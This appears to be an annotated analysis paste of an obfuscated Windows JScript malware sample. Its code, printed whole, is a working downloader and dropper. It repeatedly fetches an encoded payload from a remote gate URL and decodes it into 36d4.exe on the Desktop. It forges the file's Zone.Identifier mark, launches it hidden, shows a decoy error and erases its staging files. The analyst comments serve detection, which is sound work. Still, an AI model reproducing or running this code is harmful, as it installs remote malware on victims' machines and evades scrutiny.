MalwareBreakdown

Obfuscated ArialFont JScript file

Jun 5th, 2017
 // Live prologue: this part is not commented out, so it runs on every pass,
 // including each nested eval() of the script text performed at the end of the file.
 // bfefbdcfdfcdc is the FileSystemObject handle reused by the staging logic below.
 1.     var bfefbdcfdfcdc = new ActiveXObject('Scripting.FileSystemObject');
 2.    
 // Likely filler: FileExists() is given a bare relative file name, while DeleteFile()
 // builds its path from fcdedcaefdbdad, which on the first pass is still undefined here
 // (it is assigned on paste line 13). Nothing visible on this page creates this file.
 3.     if(bfefbdcfdfcdc.FileExists('cdcaabebebaffca.txt')){
 4.         bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffca.txt');
 5.         Wscript.echo('efefbccbda');
 6.        
 7.         Wscript.echo('efefbccbda');
 8.        
 9.         Wscript.echo('efefbccbda');
 10.     }
 // Same pattern as above with a second file name that is never created on this page.
 11.     if(bfefbdcfdfcdc.FileExists('cdcaabebebaffcaas.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffcaas.txt');
 12.    
 // GetSpecialFolder(2) is the FileSystemObject TemporaryFolder constant: all counter and
 // marker files used by the staging logic live in the user's temp directory.
 13.     var fcdedcaefdbdad = bfefbdcfdfcdc.GetSpecialFolder(2);
 14.  
 15.  
 // Start of the dormant payload. Everything from the delimiter below to its closing
 // counterpart on paste line 250 is inert as written, so a static scan of the live code
 // sees only file bookkeeping. The staging code at the end of the file removes both
 // delimiters from a copy of the script text and evals the result on the fifth pass.
 16. /*
 17.  
 // ffecbebbafcc: hex text of the downloaded payload after the digit-shift decode.
 18. var ffecbebbafcc = '';
 // fdbaeeabf: the payload as an array of byte values parsed from that hex text.
 19. var fdbaeeabf = [];
 // badbffbeabd: the payload as a string, one character per byte, ready to be written out.
 20. var badbffbeabd;
 21.  
 // Hex decoder: converts a string of two-digit hex pairs into the characters they encode.
 // Used as the final step of the string de-obfuscation routine on paste lines 88-120.
 // acfddfc: value whose toString() is a sequence of hex pairs.
 // Returns the decoded string.
 22. function fdebeccfdaf(acfddfc) {
 23.     var fdebabbbacf = acfddfc.toString();
 24.     var aedfcafcccfdad = '';
 // Step two characters at a time; each pair is parsed as base 16 and mapped to one char.
 25.     for (var eadccadbceeaad = 0; eadccadbceeaad < fdebabbbacf.length; eadccadbceeaad += 2)
 26.         aedfcafcccfdad += String.fromCharCode(parseInt(fdebabbbacf.substr(eadccadbceeaad, 2), 16));
 27.     return aedfcafcccfdad;
 28. }
 29.  
 // Numeric test: true when the argument parses as a finite number. The payload decoder
 // calls it with single characters to tell digits apart from everything else.
 30. function aaafeeffdaf(babbadebba) {
 31.   return !isNaN(parseFloat(babbadebba)) && isFinite(babbadebba);
 32. }
 33.  
 34.  
 35.  
 // Digit un-shift: subtracts daedfadcac from a single decimal digit, wrapping from 0 back
 // to 9 (subtraction modulo 10 done one step at a time).
 // beeecdadcceacbeeecdadcceac: the digit, passed in as a one-character string by the caller.
 // daedfadcac: how many steps to subtract (one entry of the server-supplied key).
 // Returns the shifted digit as a number.
 36. function ddcdafcdac(beeecdadcceacbeeecdadcceac,daedfadcac){
 37.    
 38.    
 // The loop counter i is not declared here, so it is an implicit global.
 39.     for(i=daedfadcac;i>0;i--){
 40.        
 // The subtraction coerces the one-character string to a number.
 41.         beeecdadcceacbeeecdadcceac = beeecdadcceacbeeecdadcceac - 1;
 42.        
 43.         if(beeecdadcceacbeeecdadcceac<0)beeecdadcceacbeeecdadcceac = 9;
 44.        
 45.     }
 46.  
 47.     return beeecdadcceacbeeecdadcceac;
 48.    
 49.  
 50. }
 51.  
 52.  
 53.  
 54.  
 // Payload decoder: walks the downloaded text and un-shifts every decimal digit using a
 // rolling key; every other character (including the hex letters) is copied unchanged.
 // sstrstrtbeeecdadcceacr: the encoded payload text (second field of the server response).
 // faeacdaebdbcd: array of per-position shift amounts (first field of the response).
 // Returns the decoded text, which the caller then treats as hex pairs.
 // Because the key arrives with each response, the body can differ per download, which
 // limits the value of static signatures on the network payload.
 55. function bcddfeaffacac(sstrstrtbeeecdadcceacr,faeacdaebdbcd){
 56.    
 57.    
 58.    
 59.     var fbdefbadcfecfe = sstrstrtbeeecdadcceacr.length;
 60.    
 61.     var aefacbbaebbffafbe = '';
 62.    
 63.    
 // cebffeccae is the key index; it advances only when a digit is consumed.
 64.     var cebffeccae = 0;
 65.    
 66.     for(var bbffbdbcfed=0;bbffbdbcfed<fbdefbadcfecfe;bbffbdbcfed++){
 67.        
 // The key index wraps to 0 once it exceeds 10, so key entries 0 through 10 are used.
 68.         if(cebffeccae>10)cebffeccae=0;
 69.        
 70.        
 71.         if(aaafeeffdaf(sstrstrtbeeecdadcceacr.charAt(bbffbdbcfed))){
 72.        
 73.             aefacbbaebbffafbe = aefacbbaebbffafbe + ddcdafcdac(sstrstrtbeeecdadcceacr.charAt(bbffbdbcfed),faeacdaebdbcd[cebffeccae]);
 74.             cebffeccae++;
 75.            
 76.         }else{
 77.            
 78.             aefacbbaebbffafbe = aefacbbaebbffafbe + sstrstrtbeeecdadcceacr.charAt(bbffbdbcfed);
 79.            
 80.         }
 81.        
 82.     }
 83.    
 84.     return aefacbbaebbffafbe;
 85. }
 86.  
 87.  
 // String de-obfuscator used for every sensitive literal in the payload (ProgIDs, URL,
 // command lines, file name). Each input character is looked up in a fixed 78-character
 // alphabet, moved back by fdcedeccfccb positions, and the result is hex-decoded.
 // feccdeaddccda: the obfuscated literal.
 // fdcedeccfccb: the shift; every call on this page passes 1.
 // Returns the plain-text string.
 // For analysts: the routine is pure string arithmetic, so the literals can be recovered
 // statically without executing the download or run steps.
 88. function ceecacabbad(feccdeaddccda,fdcedeccfccb){
 89.    
 // Substitution alphabet. With a shift of 1, the character following each hex digit in
 // this string is that digit's encoded form.
 90.     var eaaebfdfeedef = "^DQqM1.c8OnIbg&7:yad2BC!LFPR0l(Ux9SkKpof5G+N4@-zhVw,%3isuvjrt*;WXJAeH)_$ZT6YmE";
 91.     var baefbffba = "";
 92.  
 93.     var addebdcfcfcccc = eaaebfdfeedef.length-1;
 94.  
 95.     var size = feccdeaddccda.length;
 96.  
 97.    
 98.    
 99.     for(var eacecadafbf = 0; eacecadafbf<size ; eacecadafbf++){
 100.        
 101.         var facabcbfcddccbb = eaaebfdfeedef.indexOf(feccdeaddccda.charAt(eacecadafbf));
 102.        
 103.         var eebfdceff = facabcbfcddccbb - fdcedeccfccb;
 104.        
 // Wrap-around for indexes that fall below zero. With the shift of 1 used throughout
 // this sample, only the first alphabet character takes this branch, and the adjustment
 // below lands it on the last alphabet character.
 105.         if(eebfdceff<0){
 106.            
 107.             eebfdceff = addebdcfcfcccc - Math.abs(eebfdceff);
 108.            
 109.             var daedfadcac = addebdcfcfcccc - 1;   
 110.        
 111.             if(eebfdceff==daedfadcac)eebfdceff = eebfdceff + fdcedeccfccb;
 112.            
 113.         }
 114.        
 115.        
 116.         baefbffba = baefbffba + eaaebfdfeedef.charAt(eebfdceff);
 117.     }
 118.    
 // baefbffba now holds hex pairs; the hex decoder turns them into the final string.
 119.     return fdebeccfdaf(baefbffba);
 120. }
 121.  
 122.  
 // Payload setup. The decoded values given below were worked out by hand from the
 // alphabet on paste line 90 with shift 1; confirm them by running only the decoder
 // function in an isolated analysis environment.
 // Decodes to the Scripting.FileSystemObject ProgID (lower-cased in the encoded form).
 123. var addcfeccbca = new ActiveXObject(ceecacabbad(":iYi:BYS:l:@YSY^Y:B^YYYSY!YG:i:S:i:@YGYQYPYBYeYGYi:@",1));
 // Temp folder again (TemporaryFolder = 2), used for the marker files deleted at the end.
 124. var fcdedcaefdbdad = addcfeccbca.GetSpecialFolder(2);
 125.  
 126.  
 // Decodes to the WScript.Shell ProgID.
 127. var addcfeccbcaDeck = new ActiveXObject(ceecacabbad('G:GiYi:BYS:l:@B^:iYOYGY!Y!',1));
 // Decodes to "Desktop": the drop directory is the user's Desktop, not the temp folder.
 128. var debbcfaaaaffcdbed = addcfeccbcaDeck.SpecialFolders(ceecacabbad('@@YG:iYC:@YP:l',1));
 129. var fcdedcaefdbdadd = debbcfaaaaffcdbed;
 130.  
 // A second FileSystemObject; this variable is not referenced again on this page.
 131. var cbebdeebffcfcdbeb = new ActiveXObject(ceecacabbad(":iYi:BYS:l:@YSY^Y:B^YYYSY!YG:i:S:i:@YGYQYPYBYeYGYi:@",1));    
 132.  
 133.  
 // Decodes to the Msxml2.XMLHTTP.3.0 ProgID: the HTTP client used for the download.
 134. var efdbceecefe = new ActiveXObject(ceecacabbad('@Q:i:OYQY!iBB^GO@Q@!@OG@G@GlB^iiB^il',1));
 135.  
 136.  
 // bdadaffecae: request attempt counter, sent to the server as a query-string value.
 137. var bdadaffecae = 0;
 138.  
 // afcdafafddad: index of the URL currently being tried.
 139. var afcdafafddad = 0;
 140.  
 // Download URL list (a single entry here). Decodes by hand to
 // hxxp://sobberinfo[.]com/gate.php (defanged) -- network indicator, verify before use.
 141. var linksssee = ['YO:@:@:lieBPBP:iYPYBYBYG:BYSY^YYYPB^YiYPYQBPY:Y.:@YGB^:lYO:l'];
 142.  
 // Download loop: repeats a synchronous GET until a response with status 200 that also
 // contains the field delimiter arrives. There is no upper bound on attempts, so a host
 // running this stage keeps beaconing about once per second while the server is unreachable.
 // Detection: a script host (wscript or cscript) issuing repeated HTTP GETs whose query
 // string is "?ff" followed by an incrementing integer.
 143. while(true){
 144.    
 145.     bdadaffecae++;
 146.    
 // Past the end of the URL list: start again from the first entry.
 147.     if(linksssee[afcdafafddad] == undefined)afcdafafddad = 0;
 148.    
 149.    
 150.     try {
 151.    
 // First argument decodes to "GET" (the extra third argument to the decoder is ignored,
 // since the function declares only two parameters). The final false makes the request
 // synchronous.
 152.         efdbceecefe.open(ceecacabbad('@:@GG@',1,1), ceecacabbad(linksssee[afcdafafddad],1)+'?ff'+bdadaffecae, false);
 153.         efdbceecefe.send();
 154.    
 155.  
 156.     } catch(e) {
 157.  
 // Any request error: move to the next URL, wait one second, retry.
 158.         afcdafafddad++;
 159.         WScript.Sleep(1000);
 160.         continue;
 161.  
 162.     }
 163.    
 164.  
 // A usable response must contain the "|||" delimiter that separates key and payload.
 165.     var feabfebecfd = efdbceecefe.responseText.indexOf('|||');
 166.  
 167.     if( feabfebecfd == -1 ){
 168.        
 169.         afcdafafddad++;
 170.         WScript.Sleep(1000);
 171.         continue;
 172.        
 173.     }
 174.  
 175.    
 // A delimiter-bearing response with a non-200 status loops again immediately,
 // without the one-second sleep.
 176.     if(efdbceecefe.Status == 200)break;
 177. }
 178.  
 // Response parsing. The body has the form <key>|||<encoded payload>.
 179.    var adfeedadcaedff = efdbceecefe.responseText;
 180.    
 // The separator argument decodes to "|||".
 181.     adfeedadcaedff = adfeedadcaedff.split(ceecacabbad(':!:!:!',1));
 182.  
 // The separator decodes to ",": field 0 is a comma-separated list of digit shifts.
 183.     var bfdfdcdcebbbaed = adfeedadcaedff[0].split(ceecacabbad('B!',1));
 184.    
 185.  
 186.    
 // Undo the per-digit shift on field 1; the result is the payload as hex text.
 187. ffecbebbafcc = bcddfeaffacac(adfeedadcaedff[1],bfdfdcdcebbbaed);
 188.    
 // Another FileSystemObject handle that is not referenced again on this page.
 189. var fddcebbfafaooo = new ActiveXObject(ceecacabbad(":iYi:BYS:l:@YSY^Y:B^YYYSY!YG:i:S:i:@YGYQYPYBYeYGYi:@",1));
 190.    
 191. var  fdbaeeabf = [];
 192.  
 193.  
 194.  
 // Convert each hex pair to a byte value.
 195. for(var bbffbdbcfed=0; bbffbdbcfed< ffecbebbafcc.length-1; bbffbdbcfed+=2){
 196.     fdbaeeabf.push(parseInt(ffecbebbafcc.substr(bbffbdbcfed, 2), 16));
 197. }
 198.  
 // Build a string with one character per byte; it is written to disk as ISO-8859-1 by
 // the function that follows.
 199. badbffbeabd = String.fromCharCode.apply(String, fdbaeeabf);
 200.  
 201.  
 // Dropper: writes the decoded payload string to disk through an ADO stream.
 // abafaabfdcfedc: payload as a string with one character per byte.
 // The file name decodes by hand to "36d4.exe" and the target directory is the Desktop
 // path resolved on paste line 128 -- host indicator, verify before use.
 // Detection: a script host creating an .exe on the user's Desktop.
 202. function cceaafdcfbcdcb(abafaabfdcfedc){
 203.  
 204.  
 205. var bcafececaae = abafaabfdcfedc;
 // ProgID decodes to ADODB.Stream.
 206. var ddbeeecedcdc = new ActiveXObject(ceecacabbad('@.@@@P@@@BB^Gi:@:BYGY.YQ',1));
 // Type 2 is text mode; with the ISO-8859-1 charset each character is stored as one byte.
 207. ddbeeecedcdc.Type = 2;
 208. ddbeeecedcdc.Charset = 'ISO-8859-1';
 209. ddbeeecedcdc.Open();
 210. ddbeeecedcdc.WriteText(bcafececaae);
 // Save option 2 overwrites an existing file of the same name.
 211. ddbeeecedcdc.SaveToFile(fcdedcaefdbdadd + '/' +ceecacabbad('iiiYY@i@B^YG:OYG',1), 2);
 212. ddbeeecedcdc.Close();
 213.  
 214. }
 215.  
 216.  
 217.  
 218.  
 219.  
 // Final stage: drop the payload, rewrite its zone marking, launch it, show a decoy
 // error, remove the staging files, and exit.
 220. cceaafdcfbcdcb(badbffbeabd);
 221.  
 222.  
 223.    var fddcebbfafa = new ActiveXObject(ceecacabbad(":iYi:BYS:l:@YSY^Y:B^YYYSY!YG:i:S:i:@YGYQYPYBYeYGYi:@",1));
 224.    
 225.  
 // Remember whether the activation marker exists so it can be deleted below.
 226.     var abaffdddbeafbacb = fddcebbfafa.FileExists(fcdedcaefdbdad + '/' +'cecabddbfacbdb.txt');
 227.    
 // WScript.Shell, used for the three Run() calls that follow.
 228.     var bedbcafcabb = new ActiveXObject(ceecacabbad('G:GiYi:BYS:l:@B^:iYOYGY!Y!',1));
 229.            
 230.        
 231.    
 232.  
 // The three Run() calls share window style 0 (hidden) and do not wait for completion,
 // so their relative order is not guaranteed. Decoded by hand:
 //   1) cmd.exe /c "echo [ZoneTransfer]> <Desktop>\36d4.exe:Zone.Identifier"
 //   2) cmd.exe /c "echo ZoneId=2>> <Desktop>\36d4.exe:Zone.Identifier"
 //   3) cmd.exe /c <Desktop>\36d4.exe
 // Calls 1 and 2 overwrite the Zone.Identifier alternate data stream of the dropped file
 // with ZoneId=2 (Trusted sites), i.e. they tamper with its Mark-of-the-Web before launch.
 // Detection: wscript or cscript spawning cmd.exe with "Zone.Identifier" on the command
 // line, or any process writing a Zone.Identifier stream it did not download.
 233. bedbcafcabb.Run(ceecacabbad('YiYQY@B^YG:OYGBlBPYiBl',1) + ceecacabbad('BBYGYiYOYPBlGCGeYPY^YGG@:BY.Y^:iYYYG:BGQi^Bl',1)+ fcdedcaefdbdadd +'\\'+ ceecacabbad('iiiYY@i@B^YG:OYG',1)+ceecacabbad('ieGeYPY^YGB^@SY@YGY^:@YSYYYSYG:BBB',1),0,false);
 234.  
 235. bedbcafcabb.Run(ceecacabbad('YiYQY@B^YG:OYGBlBPYiBl',1) + ceecacabbad('BBYGYiYOYPBlGeYPY^YG@SY@iQiBi^i^Bl',1)+ fcdedcaefdbdadd +'\\'+ ceecacabbad('iiiYY@i@B^YG:OYG',1)+ceecacabbad('ieGeYPY^YGB^@SY@YGY^:@YSYYYSYG:BBB',1),0,false);
 236.  
 237.    
 238. bedbcafcabb.Run(ceecacabbad('YiYQY@B^YG:OYGBlBPYiBl',1)+ fcdedcaefdbdadd +'\\'+ ceecacabbad('iiiYY@i@B^YG:OYG',1),0,false);
 239.  
 240.  
 241.    
 242.    
 // Decoy dialog: a fabricated runtime error shown to the user after the payload has
 // already been started, presumably to explain why nothing visible happened.
 243.     WScript.echo('Runtime Error 0x48940 (.QBT) Library not located on the system, please use x64 system.');
 244.  
 // Cleanup of the pass counter and the activation marker in the temp folder, so the
 // staging files are gone by the time the host is examined.
 245.     fddcebbfafa.DeleteFile(fcdedcaefdbdad + '/' +'fbdefbadcfecfeer.txt');
 246.     if(abaffdddbeafbacb)fddcebbfafa.DeleteFile(fcdedcaefdbdad + '/' +'cecabddbfacbdb.txt');
 247.    
 // Ends the script host here, so the staging code further down does not run again.
 248.     WScript.Quit();
 249.    
 // End of the dormant payload.
 250.     */
 251.    
 // File reader: returns the entire contents of a text file.
 // fcbbdfd: path of the file to read.
 // The only caller on this page passes WScript.ScriptFullName, i.e. the script reads
 // its own source from disk so that it can be modified and passed to eval().
 252.     function ceaeaaecefa(fcbbdfd){
 253.        
 254.  
 255.         var dfedaddbdfeed = new ActiveXObject('Scripting.FileSystemObject');
 256.        
 257.         var ecefcbacedebfda = fcbbdfd;
 258.        
 259.         var bcbdbacebfbeecff = ecefcbacedebfda;
 260.    
 // I/O mode 1 opens the file for reading.
 261.         var fadefbfedbfcaa = dfedaddbdfeed.OpenTextFile(bcbdbacebfbeecff, 1);
 262.        
 263.         var fffbcaecdacedf =  fadefbfedbfcaa.ReadAll();
 264.                
 265.         fadefbfedbfcaa.Close();
 266.        
 267.         return fffbcaecdacedf;
 268.        
 269.     }
 270.  
 271.    
 // Staging logic (live code). A pass counter is kept in a temp-folder file and the script
 // evals its own on-disk source at the end of every pass, so a single launch recurses:
 // passes 1-4 only bump the counter, pass 5 strips the block-comment delimiters and evals
 // the now-active payload. An analysis that does not follow eval() or model the file
 // system never reaches the download and run code.
 // Host indicators in the temp folder, all named on this page: fbdefbadcfecfeer.txt
 // (counter), cadabcdeabceaded.txt (written on pass 4), cecabddbfacbdb.txt (marker).
 272.    var fbdefbadcfecfe = 0;
 // Read the previous counter value if the counter file exists (mode 1 = read).
 273.    var abaffdddbeafbacb = bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fbdefbadcfecfeer.txt');
 274.    if(abaffdddbeafbacb == true){
 275.     var fcbbfeadfdadb = bfefbdcfdfcdc.OpenTextFile(fcdedcaefdbdad + '/' + 'fbdefbadcfecfeer.txt', 1,1);
 276.     fbdefbadcfecfe = fcbbfeadfdadb.ReadAll();
 277.             fcbbfeadfdadb.Close();
 278.    }
 // parseInt is called without a radix; the value read back is the decimal number
 // written by WriteLine below.
 279.     fbdefbadcfecfe = parseInt(fbdefbadcfecfe) +1;
 280.    
 // Same filler pattern as the prologue: relative-name check, temp-folder delete.
 281. if(bfefbdcfdfcdc.FileExists('cdcaabebebaffc3.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffc3.txt');
 282.    
 // Persist the incremented counter (mode 2 = write, create the file if missing).
 283.     fcbbfeadfdadb = bfefbdcfdfcdc.OpenTextFile(fcdedcaefdbdad + '/' + 'fbdefbadcfecfeer.txt', 2,1);
 284.    
 285.     fcbbfeadfdadb.WriteLine(fbdefbadcfecfe);
 286.     fcbbfeadfdadb.Close();
 287.    
 // Load this script's own text from disk; this is what gets passed to eval() below.
 288.     var caecebcfccacab = WScript.ScriptFullName;
 289.     var feeddabdbddfb = ceaeaaecefa(caecebcfccacab);
 290.    
 291.     if(bfefbdcfdfcdc.FileExists('cdcaabebebaffc.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffc.txt');
 292.    
 // Pass 4: create the file that pass 5 renames into the activation marker.
 293.     if(fbdefbadcfecfe==4){
 294.        
 295.        
 296.         fcbbfeadfdadb = bfefbdcfdfcdc.OpenTextFile(fcdedcaefdbdad + '/' + 'cadabcdeabceaded.txt', 2,1);
 297.        
 298.         if(bfefbdcfdfcdc.FileExists('cdcaabebebaffca.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffca.txt');
 299.        
 300.         fcbbfeadfdadb.WriteLine(fbdefbadcfecfe);
 301.         fcbbfeadfdadb.Close();
 302.        
 303.     }
 304.    
 // Pass 5: arm the payload.
 305.     if(fbdefbadcfecfe==5){
 306.        
 307.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fadaeabefaac.jpg'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fadaeabefaac.jpg');
 // Renaming the pass-4 file creates the marker tested before the first eval() below.
 308.         bfefbdcfdfcdc.MoveFile(fcdedcaefdbdad + '/' + 'cadabcdeabceaded.txt', fcdedcaefdbdad + '/' + 'cecabddbfacbdb.txt');
 // The same check-and-delete is repeated four times; only the first can have any effect.
 309.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fcefbfaef.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fcefbfaef.txt');
 310.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fcefbfaef.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fcefbfaef.txt');
 311.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fcefbfaef.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fcefbfaef.txt');
 312.        
 313.         if(bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'fcefbfaef.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'fcefbfaef.txt');
 314.        
 315.  
 316.         if(bfefbdcfdfcdc.FileExists('cdcaabebebaffca.txt'))bfefbdcfdfcdc.DeleteFile(fcdedcaefdbdad + '/' + 'cdcaabebebaffca.txt');
 317.    
 // String-pattern replace() removes only the first match, so this strips the first
 // block-comment opener and the first closer from the in-memory copy of the script,
 // plus up to five occurrences of a fixed marker string. The file on disk is unchanged.
 // NOTE(review): on this page the marker string occurs only inside this statement, so
 // the marker replacements act on this line's own literals.
 318.         feeddabdbddfb = feeddabdbddfb.replace('/*','').replace('*/', '').replace('ebdcedddfdcddccae', '').replace('ebdcedddfdcddccae', '').replace('ebdcedddfdcddccae', '').replace('ebdcedddfdcddccae', '').replace('ebdcedddfdcddccae', '');
 319.     }
 320.    
 321.    
 322.  
 323.     var abaffdddbeafbacb = bfefbdcfdfcdc.FileExists(fcdedcaefdbdad + '/' + 'cecabddbfacbdb.txt');
 324.  
 // Marker present: eval the script text. On pass 5 this is the un-commented copy, whose
 // payload section ends in WScript.Quit(), so the second eval() is not reached then.
 325.      if(abaffdddbeafbacb == true){
 326.        
 327.        eval(feeddabdbddfb);
 328.        
 329.     }
 330.  
 331.    
 // Unconditional self-eval: this is what drives the recursion through passes 1 to 5
 // within one launch of the script.
 332.     eval(feeddabdbddfb);